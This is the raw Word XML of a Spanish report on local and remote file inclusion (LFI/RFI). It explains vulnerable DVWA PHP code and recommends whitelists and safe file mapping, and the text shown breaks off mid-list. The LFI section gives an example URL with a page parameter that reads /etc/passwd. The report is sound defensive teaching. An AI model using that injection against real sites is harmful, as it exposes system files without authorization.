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AFD2" w14:textId="26271177" w:rsidR="005C2BE0" w:rsidRPr="001872EF" w:rsidRDefault="00BF4F8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480AD" wp14:editId="60458F8D">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1034893075" name="Imagen 1" descr="un estudio sobre las vulnerabilidades local file inclusion y remote file inclusion, que sea de carácter profesional y serio ya que es para un in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estudio sobre las vulnerabilidades local file inclusion y remote file inclusion, que sea de carácter profesional y serio ya que es para un infor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F1B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0C285" w14:textId="77777777" w:rsidR="002B75D0" w:rsidRDefault="002B75D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4028D" w14:textId="77777777" w:rsidR="00BF4F85" w:rsidRPr="001872EF" w:rsidRDefault="00BF4F8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D4A4" w14:textId="5476653B" w:rsidR="001872EF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72EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>INFORME DE VULNERABILIDADES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EEE730" w14:textId="77777777" w:rsidR="00BF4F85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21C6FB" w14:textId="3FAADEC1" w:rsidR="001872EF" w:rsidRPr="001872EF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72EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>LFI Y RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BF6A4" w14:textId="5F7CBB14" w:rsidR="009B26AE" w:rsidRPr="001872EF" w:rsidRDefault="009B26AE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0EBDFA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21DA2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35CC2" w14:textId="77777777" w:rsidR="00AF1617" w:rsidRPr="00BF4F85" w:rsidRDefault="00AF1617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9BE6D" w14:textId="062B4420" w:rsidR="00AF1617" w:rsidRPr="006866E5" w:rsidRDefault="002B75D0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66E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.- </w:t>
      </w:r>
      <w:r w:rsidR="005A6BA4" w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INTRODUCCIÓN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CABB5A0" w14:textId="5BBDD318" w:rsidR="001872EF" w:rsidRDefault="001872EF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2EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00526D35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l presente</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> informe aborda las vulnerabilidades de inclusión de archivos locales (LFI) e inclusión de archivos remotos (RFI) en aplicaciones web</w:t>
      </w:r>
      <w:r w:rsidR="00526D35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, analizando dos ejemplos</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de código con niveles de seguridad bajo y medio, </w:t>
      </w:r>
      <w:r w:rsidR="00526D35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">donde se </w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explica cómo se producen estas vulnerabilidades y se proporcionan recomendaciones para mitigarlas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E21DA6" w14:textId="77777777" w:rsidR="004007F0" w:rsidRPr="001872EF" w:rsidRDefault="004007F0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63B661" w14:textId="6B10A707" w:rsidR="001872EF" w:rsidRDefault="00526D35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1617">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. VULNERABILIDAD DE INCLUSIÓN DE ARCHIVOS LOCALES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D644B34" w14:textId="77777777" w:rsidR="005F6B60" w:rsidRPr="00AF1617" w:rsidRDefault="005F6B60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6589FCD" w14:textId="18FCE935" w:rsidR="001872EF" w:rsidRPr="00E561F8" w:rsidRDefault="00526D35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561F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.- </w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="00E561F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
      <w:r w:rsidR="001A1D47" w:rsidRPr="00E561F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LFI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F40C0" w14:textId="47E61661" w:rsidR="001872EF" w:rsidRDefault="00526D35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taque guarda una estrecha relación con la vulnerabilidad “Path Traversal”</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, estableciéndose la diferencia que el primero únicamente presenta la posibilidad de modificar los parámetros de la aplicación web y escapando a contenido sensible dentro del servidor, y en un FLI, además de lo anterior, permite la ejecución de código y la inclusión de archivos en el servidor-web, normalmente, en lenguaje de programación PHP</w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Todo esto, </w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>puede llevar a la exposición</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y sustracción</w:t>
      </w:r>
      <w:r w:rsidR="001872EF" w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de información sensible y, en algunos casos, a la ejecución de código malicioso</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060E1A3" w14:textId="77777777" w:rsidR="004007F0" w:rsidRPr="001872EF" w:rsidRDefault="004007F0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73D420" w14:textId="3FCA0BCA" w:rsidR="001872EF" w:rsidRPr="00651C2A" w:rsidRDefault="001872EF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1C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de Código </w:t>
      </w:r>
      <w:r w:rsidR="00064B1D" w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">extraído de DVWA, de </w:t>
      </w:r>
      <w:r w:rsidR="00064B1D" w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NIVEL BAJO</w:t>
      </w:r>
      <w:r w:rsidR="00064B1D" w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA9240" w14:textId="77777777" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853C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69CD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F3E3C2C" wp14:editId="5FB4E8E2">
            <wp:extent cx="5409307" cy="1254642"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
            <wp:docPr id="18731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274" cy="12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F46D" w14:textId="77777777" w:rsidR="005F6B60" w:rsidRPr="008E69CD" w:rsidRDefault="005F6B60" w:rsidP="008853C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1D6F7A0" w14:textId="77777777" w:rsidR="003E6A8A" w:rsidRDefault="003E6A8A" w:rsidP="008E69C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36DF0FA3" w14:textId="2F47D584" w:rsidR="00AF1617" w:rsidRPr="008E69CD" w:rsidRDefault="008E69CD" w:rsidP="008E69C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E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1.- </w:t>
      </w:r>
      <w:r w:rsidR="00AF1617" w:rsidRPr="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35650881" w14:textId="16743B9C" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="00ED25DB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proofErr w:type="gramStart"/>
      <w:r w:rsidRP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Apertura del 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bloque </w:t>
      </w:r>
      <w:r w:rsidRP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&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008853CE"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hp)</w:t>
      </w:r>
      <w:r w:rsidR="00AC7B6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cierre (?&gt;)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l script PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC7517" w14:textId="77777777" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE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Comentario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(// The page we wish to display</w:t>
      </w:r>
      <w:r w:rsidRPr="008853CE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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284CC5F" w14:textId="1792CF4D" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853CE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e es un comentario en línea que explica que la variable </w:t>
      </w:r>
      <w:r w:rsidR="00ED25DB" w:rsidRP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</w:t>
      </w:r>
      <w:r w:rsidR="00ED25DB" w:rsidRP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tendrá la página que deseamos mostrar. Los comentarios en PHP se inician con // y se extienden hasta el final de la línea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1381E" w14:textId="77777777" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE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Asignación de la Variable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72F2CE68" w14:textId="34E50CED" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853CE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_GET['page']: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st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 comando d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HP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tiene los datos enviados a través de la URL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sando el método GET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y,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 este </w:t>
      </w:r>
      <w:r w:rsidR="0015488D"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aso, está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ccediendo al parámetro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r w:rsid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 la URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C2BF4" w14:textId="4DD218B2" w:rsidR="004007F0" w:rsidRPr="004007F0" w:rsidRDefault="008853CE" w:rsidP="004007F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 = $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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GET[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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'page'];: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sta línea asigna el valor del parámetro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 la URL a la variable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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36713225" w14:textId="48ABD602" w:rsidR="008853CE" w:rsidRPr="008E69CD" w:rsidRDefault="004007F0" w:rsidP="004007F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.</w:t>
      </w:r>
      <w:r w:rsidR="00423A7E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</w:t>
      </w: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.</w:t>
      </w:r>
      <w:r w:rsidR="008E69CD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</w:t>
      </w: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- Vulnerable a LFI o inclusión de archivos locales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D8085" w14:textId="5BDA2BCD" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="004007F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e código es vulnerable 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 la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Inclusión de Archivos Locales (LFI)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lo que u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ctor malicioso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</w:t>
      </w:r>
      <w:r w:rsidR="004007F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dría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anipular el parámetro </w:t>
      </w:r>
      <w:r w:rsidR="004007F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 la URL para incluir archivos locales del servidor. Por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4858484E" w14:textId="1EBCCE4F" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="007702D5" w:rsidP="0088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ab/>
      </w:r>
      <w:r w:rsidR="008853CE"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http://example.com/index.php?page=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B125D" w14:textId="3C74FDD6" w:rsidR="007702D5" w:rsidRDefault="008853CE" w:rsidP="004007F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i el código posteriormente incluye el archivo especificado en $file sin ninguna validación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listas blancas, etc)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el atacante podría acceder a archivos sensibles del sistema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y si el código incluyera el comando </w:t>
      </w:r>
      <w:r w:rsidR="007702D5" w:rsidRPr="007702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Include=$file</w:t>
      </w:r>
      <w:r w:rsidR="007702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, </w:t>
      </w:r>
      <w:r w:rsidR="007702D5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ntonces el atacante no solo </w:t>
      </w:r>
      <w:r w:rsidR="00661039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odría</w:t>
      </w:r>
      <w:r w:rsidR="007702D5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cceder y observar el contenido sensible, sino que podría ejecutar código malicioso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24AE8D8B" w14:textId="49A4DE07" w:rsidR="008853CE" w:rsidRPr="008E69CD" w:rsidRDefault="004007F0" w:rsidP="004007F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.</w:t>
      </w:r>
      <w:r w:rsidR="00423A7E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.</w:t>
      </w:r>
      <w:r w:rsid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3</w:t>
      </w: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.- </w:t>
      </w:r>
      <w:r w:rsidR="008853CE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Mitigación</w:t>
      </w:r>
      <w:r w:rsidR="009D6B8B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 del riesgo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5778DEF1" w14:textId="5F4986FA" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="004007F0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ara mitigar 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os efectos de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a vulnerabilidad, es crucial validar y sanitizar todas las entradas del usuario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alguna/s de las siguientes recomendaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530DAE66" w14:textId="2A7EB8D3" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853C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r la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trada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s, asegurando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que solo se puedan incluir archivos permitidos.</w:t>
      </w:r>
      <w:r w:rsidR="00AF1617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jemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D933E29" w14:textId="5EE6AAB0" w:rsidR="003E6A8A" w:rsidRDefault="003E6A8A" w:rsidP="003E6A8A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3E6A8A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D163AC3" wp14:editId="7B5DF331">
            <wp:extent cx="4982766" cy="1264258"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="134907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160" cy="12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9A4" w14:textId="0DB808B0" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="008853C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tilizar Listas Blancas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que p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rmit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n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50517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únicament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rchivos específicos que sean seguros.</w:t>
      </w:r>
      <w:r w:rsidR="00AF1617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jemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A4D96" w14:textId="77777777" w:rsidR="009D6B8B" w:rsidRPr="003E6A8A" w:rsidRDefault="00AF1617" w:rsidP="009D6B8B">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1416"/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</w:pPr>
      <w:r w:rsidRPr="003E6A8A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$allowed_pages = array (“home”, “about”, “contact”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4CBD46" w14:textId="5D8D9DC1" w:rsidR="003E6A8A" w:rsidRPr="003E6A8A" w:rsidRDefault="008853CE" w:rsidP="003E6A8A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vitar la Inclusión Directa de Archivos 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or </w:t>
      </w:r>
      <w:r w:rsidR="00661039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trada del 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</w:t>
      </w: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uario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usar un mapeo seguro de nombres de archivos. Por ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5202A94F" w14:textId="77777777" w:rsidR="003E6A8A" w:rsidRPr="003E6A8A" w:rsidRDefault="003E6A8A" w:rsidP="003E6A8A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</w:p>
    <w:p w14:paraId="77012430" w14:textId="5B145BC9" w:rsidR="003E6A8A" w:rsidRPr="009D6B8B" w:rsidRDefault="003E6A8A" w:rsidP="003E6A8A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3E6A8A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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37121785" wp14:editId="0D63C0E9">
            <wp:extent cx="5074090" cy="1455089"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2112227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7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564" cy="14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EF7A" w14:textId="217E35DD" w:rsidR="00505170" w:rsidRDefault="00505170" w:rsidP="00505170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94B821C" w14:textId="30CB12D6" w:rsidR="003E6A8A" w:rsidRDefault="003E6A8A" w:rsidP="003E6A8A">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"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5170" w:rsidRPr="00505170">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Esto es un array q</w:t>
      </w:r>
      <w:r w:rsidR="00505170">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ue asocia o mapea un </w:t>
      </w:r>
      <w:r w:rsidR="00E62B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>identificador a</w:t>
      </w:r>
      <w:r w:rsidR="00505170">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cada recurso </w:t>
      </w:r>
      <w:r w:rsidR="00E62B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o archivo</w:t>
      </w:r>
      <w:r w:rsidR="00505170">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> real del sistema</w:t>
      </w:r>
      <w:r w:rsidR="00E62B2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. El usuario solo tendrá acceso al identificador, proporcionándole una capa de protección adicional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E8C94" w14:textId="1336903B" w:rsidR="008853CE" w:rsidRDefault="008853CE" w:rsidP="009D6B8B">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio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853CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo </w:t>
      </w:r>
      <w:r w:rsidR="003E6A8A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">completo </w:t>
      </w:r>
      <w:r w:rsidRPr="008853CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de Código Seguro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF4AE09" w14:textId="77777777" w:rsidR="005268F9" w:rsidRDefault="005268F9" w:rsidP="005268F9">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevi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F10F975" w14:textId="23F198D1" w:rsidR="009D6B8B" w:rsidRPr="008853CE" w:rsidRDefault="009D6B8B" w:rsidP="009D6B8B">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevi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D6B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05861" wp14:editId="4A4DAFAD">
            <wp:extent cx="5088255" cy="2099144"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="923590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0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570" cy="21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B001" w14:textId="16660193" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="009D6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:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3429C1F2" w14:textId="0AE71C1E" w:rsidR="001872EF" w:rsidRPr="008E69CD" w:rsidRDefault="001872EF" w:rsidP="00415A5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E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00423A7E" w:rsidRPr="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00415A52" w:rsidRPr="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008E69CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A86F2F7" w14:textId="6285D939" w:rsidR="001872EF" w:rsidRPr="00457DBA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DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Validar y san</w:t>
      </w:r>
      <w:r w:rsidR="008C0D19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ear</w:t>
      </w:r>
      <w:r w:rsidRPr="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> todas las entradas del usuario</w:t>
      </w:r>
      <w:r w:rsidR="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A1D47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asegurando</w:t>
      </w:r>
      <w:r w:rsidRPr="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que solo se puedan incluir archivos permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589893A" w14:textId="77777777" w:rsidR="00457DBA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DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Utiliza</w:t>
      </w:r>
      <w:r w:rsidR="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ción de </w:t>
      </w:r>
      <w:r w:rsidRPr="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listas blancas</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CF237" w14:textId="31EC2755" w:rsidR="001872EF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72EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configurar el servidor para restringir el acceso a archivos sensibles</w:t>
      </w:r>
      <w:r w:rsidR="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, asegurando que</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
